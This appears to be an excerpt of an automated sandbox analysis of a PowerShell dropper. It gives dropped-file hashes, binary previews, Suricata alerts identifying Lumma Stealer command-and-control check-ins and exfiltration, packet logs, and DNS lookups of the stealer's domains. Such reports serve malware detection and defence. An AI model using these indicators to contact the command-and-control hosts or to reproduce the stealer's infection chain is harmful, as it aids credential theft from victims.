                                                                                          Entropy (8bit):6.908020029901359
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                          MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                          SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                          SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                          SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\jcysbXpH.zip

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                          Category:dropped
                                                                                          Size (bytes):23383250
                                                                                          Entropy (8bit):7.998153646469816
                                                                                          Encrypted:true
                                                                                          SSDEEP:393216:ApfxCtjvxsixXiISDyrnzSKRfCcO2GJak83clI7ub4e1TgEg96a+njJpzwcjI1Pt:AhxKjvJQR8zdRfCcHI83T7ubr1T6wJp0
                                                                                          MD5:9745CEE6349AC275E7E375F0462BA48A
                                                                                          SHA1:DB8E2A5822E9123F3108FBAF4EF18E41914C2929
                                                                                          SHA-256:6632F3322CB604D2613241185163EBA61776618247A9D247A41A8EFE6762B4B0
                                                                                          SHA-512:87FD6EE881166D5DCF15069D2D9AD49FD1EEA9952A1D270CC2DBB33DECFEE6E1CC0F9BCD9C2D7B171BDB35840ADEAAE1F31D913DC2E5BBB13213FA9F8F8CFAE7
                                                                                          Malicious:false
                                                                                          Preview:PK.........(wYf9).%.....'.....QtCore4.dll.Z}x.E..N:.3.LG..%.......x.8.%,.'jO...v..&8.|9sfO`..sGS.............Cw&.L..!.f..aU.....d.}..{2.D.n.'...............H6!...h...D......G..)..O^..;u'W.wj.{.]..a...Y.c..5..w[.{W[.YmYx.b.}kV.=g.8.5.........$.W.YI.QH[..Yr..3J"..._]r...K...?K>...K...La..%.,..K/gi.=w.B...".HH..Cj.......c9.!...b.ge...@...[.0......!..p.KU......P].1!.&.X..Tr]#O.{o*..W.....`....Gd._w.E?v.s.O2..x.n.@.......5.o!..9.W.....6.}o...-..-...H..om1!3!..8.......w.....Lr!}x..t....]...E......!..........-..*8....,.,Z~.v.e..........sf2..y.j...G.....\.[x.,>!.UNer..........#M.!.......V.yh:..&`..B..t.>..W9...y./.T..M.}....-...]}63_'.X.7qst.......L.7.O..H..}.YKO+'.h t.=.......F.OR.....C..q.v|.../...c..p.7.%.$....M1....1..C.`......@.A..5 V.~.AS/k.a...oH...R...3....0/E..fj.0R.w@...4.yp.a..[{.I.......)......_f.?../s.b.D.4..."....5......""L;..".X*iP.4..#K...".>..Bj....t.i........Hi._&...."...W.H.F.e......9...C.%.:..d..Q.._f...o'...0B!...m+5st...=

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:ASCII text, with very long lines (65265), with CRLF line terminators
                                                                                          Entropy (8bit):5.998971392852043
                                                                                          TrID:
                                                                                            File name:IaslcsMo.ps1
                                                                                            File size:31'179'107 bytes
                                                                                            MD5:d7c9613ed12144aea20bee90fd5057e5
                                                                                            SHA1:268f3d77e4b82f68c842a4c01f96a6ba864c09fb
                                                                                            SHA256:aa22e017141e1c5974e00c72f2de158072cf9279cfedff86ac1734c6947a19e8
                                                                                            SHA512:e4a89e623561f5b8434cabb5aaa2cef9d15bdff3f791029dbae8d017c8027928efec9371300b55ad5edde394673ba9c2a0ccac56f7996f69324010f55c30f77b
                                                                                            SSDEEP:49152:TUfvkgL6E9gTSTWi6fMJyDHol83vPi037qiLya6YWBJacr69CKwmxJUEqw2cl3+2:1
                                                                                            TLSH:946733305E9A3DBE476C8329707F6F1D1FB01F96888CB4DB439475C712AAB80992786D
                                                                                            File Content Preview:.. $cNbGytXJ = "Stop".. Set-Location $Env:AppData.. $avOQhqfd = "$Env:AppData\VWPGdipf".. if (Test-Path $avOQhqfd) {.. if (Test-Path "$Env:AppData\RYJmNlDd.txt") {.. Remove-Item "$Env:AppData\RYJmNlDd.txt".. }..

                                                                                            File Icon

                                                                                            Icon Hash:3270d6baae77db44

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-11-25T10:54:27.181198+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.2.224443TCP
                                                                                            2024-11-25T10:54:27.904326+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449736104.21.2.224443TCP
                                                                                            2024-11-25T10:54:27.904326+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736104.21.2.224443TCP
                                                                                            2024-11-25T10:54:29.847246+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.2.224443TCP
                                                                                            2024-11-25T10:54:30.605000+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449737104.21.2.224443TCP
                                                                                            2024-11-25T10:54:30.605000+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737104.21.2.224443TCP
                                                                                            2024-11-25T10:54:32.277939+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.2.224443TCP
                                                                                            2024-11-25T10:54:34.691302+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.2.224443TCP
                                                                                            2024-11-25T10:54:37.092994+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.2.224443TCP
                                                                                            2024-11-25T10:54:40.740867+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.2.224443TCP
                                                                                            2024-11-25T10:54:42.656039+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449741104.21.2.224443TCP
                                                                                            2024-11-25T10:54:44.455907+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.2.224443TCP
                                                                                            2024-11-25T10:54:48.033683+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449755104.21.2.224443TCP
                                                                                            2024-11-25T10:54:48.760831+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449755104.21.2.224443TCP
                                                                                            2024-11-25T10:54:50.166527+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449761172.67.75.40443TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 25, 2024 10:54:25.915328026 CET49736443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:25.915381908 CET44349736104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:25.915460110 CET49736443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:25.918623924 CET49736443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:25.918633938 CET44349736104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:27.181122065 CET44349736104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:27.181197882 CET49736443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:27.211194992 CET49736443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:27.211215973 CET44349736104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:27.211520910 CET44349736104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:27.269866943 CET49736443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:27.269927025 CET49736443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:27.270056009 CET44349736104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:27.904325008 CET44349736104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:27.904417038 CET44349736104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:27.904484987 CET49736443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:27.914217949 CET49736443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:27.914236069 CET44349736104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:28.540906906 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:28.540956974 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:28.541049004 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:28.541307926 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:28.541320086 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:29.847184896 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:29.847245932 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:29.859668970 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:29.859690905 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:29.859970093 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:29.861190081 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:29.861211061 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:29.861257076 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.605001926 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.605067968 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.605094910 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.605108976 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.605135918 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.605180979 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.605189085 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.621495008 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.621570110 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.621592045 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.629775047 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.629833937 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.629852057 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.724734068 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.724777937 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.724790096 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.724809885 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.724860907 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.815308094 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.815448046 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.815507889 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.815963984 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.815985918 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.815999031 CET49737443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.816015005 CET44349737104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.997019053 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:30.997072935 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:30.997143030 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:31.011656046 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:31.011693954 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:32.277856112 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:32.277939081 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:32.280472040 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:32.280482054 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:32.280682087 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:32.288184881 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:32.291695118 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:32.291729927 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:32.294511080 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:32.294521093 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:33.158160925 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:33.158268929 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:33.158327103 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:33.159985065 CET49738443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:33.160001040 CET44349738104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:33.387063026 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:33.387123108 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:33.387330055 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:33.387466908 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:33.387480021 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:34.691224098 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:34.691302061 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:34.696926117 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:34.696948051 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:34.697148085 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:34.698087931 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:34.698187113 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:34.698220968 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:35.467277050 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:35.467376947 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:35.467475891 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:35.467744112 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:35.467775106 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:35.787775993 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:35.787846088 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:35.787938118 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:35.788294077 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:35.788305998 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:37.092912912 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:37.092993975 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:37.094238043 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:37.094249010 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:37.094464064 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:37.095954895 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:37.096091032 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:37.096117973 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:37.096172094 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:37.096180916 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:38.161564112 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:38.161663055 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:38.161714077 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:38.161782026 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:38.161798954 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:39.517400026 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:39.517457008 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:39.517553091 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:39.517822981 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:39.517839909 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:40.740781069 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:40.740866899 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:40.744014025 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:40.744023085 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:40.744412899 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:40.745654106 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:40.745726109 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:40.745731115 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:42.656133890 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:42.656349897 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:42.656404972 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:42.656649113 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:42.656671047 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:43.241756916 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:43.241808891 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:43.242517948 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:43.242784023 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:43.242794037 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.455732107 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.455907106 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.491202116 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.491229057 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.491672993 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.495927095 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.506366014 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.506432056 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.506746054 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.506778002 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.510577917 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.510629892 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.511866093 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.511909962 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.514605999 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.514647007 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.515363932 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.515403986 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.515412092 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.515424967 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.515574932 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.515602112 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.515633106 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.518601894 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.518640041 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.559329033 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.562683105 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.562720060 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.562742949 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.562762976 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.562784910 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.562797070 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.562819004 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.562824965 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:46.729223967 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:46.729501963 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:46.729748011 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:46.729821920 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:46.729851007 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:46.771301031 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:46.771368980 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:46.771447897 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:46.771744967 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:46.771763086 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.033611059 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.033683062 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:48.035320997 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:48.035326958 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.035521030 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.036700010 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:48.036721945 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:48.036746979 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.760832071 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.760912895 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.761089087 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:48.761193991 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:48.761193991 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:48.761239052 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.761265993 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.903093100 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:48.903143883 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.903213978 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:48.905096054 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:48.905117989 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.166428089 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.166527033 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:50.168117046 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:50.168137074 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.168374062 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.169452906 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:50.215329885 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.614115000 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.614337921 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.614440918 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.614527941 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:50.614564896 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.614618063 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:50.614651918 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.616501093 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.616556883 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:50.616576910 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.625210047 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.625281096 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:50.625297070 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.625332117 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.625395060 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:50.625492096 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:50.625507116 CET44349761172.67.75.40192.168.2.4
                                                                                            Nov 25, 2024 10:54:50.625518084 CET49761443192.168.2.4172.67.75.40
                                                                                            Nov 25, 2024 10:54:50.625523090 CET44349761172.67.75.40192.168.2.4

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 25, 2024 10:54:25.534615040 CET6314853192.168.2.41.1.1.1
                                                                                            Nov 25, 2024 10:54:25.869096041 CET53631481.1.1.1192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.764528036 CET5615753192.168.2.41.1.1.1
                                                                                            Nov 25, 2024 10:54:48.902173042 CET53561571.1.1.1192.168.2.4

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Nov 25, 2024 10:54:25.534615040 CET192.168.2.41.1.1.10x5120Standard query (0)marchhappen.cyouA (IP address)IN (0x0001)false
                                                                                            Nov 25, 2024 10:54:48.764528036 CET192.168.2.41.1.1.10x818dStandard query (0)rentry.coA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Nov 25, 2024 10:54:25.869096041 CET1.1.1.1192.168.2.40x5120No error (0)marchhappen.cyou104.21.2.224A (IP address)IN (0x0001)false
                                                                                            Nov 25, 2024 10:54:25.869096041 CET1.1.1.1192.168.2.40x5120No error (0)marchhappen.cyou172.67.129.193A (IP address)IN (0x0001)false
                                                                                            Nov 25, 2024 10:54:48.902173042 CET1.1.1.1192.168.2.40x818dNo error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
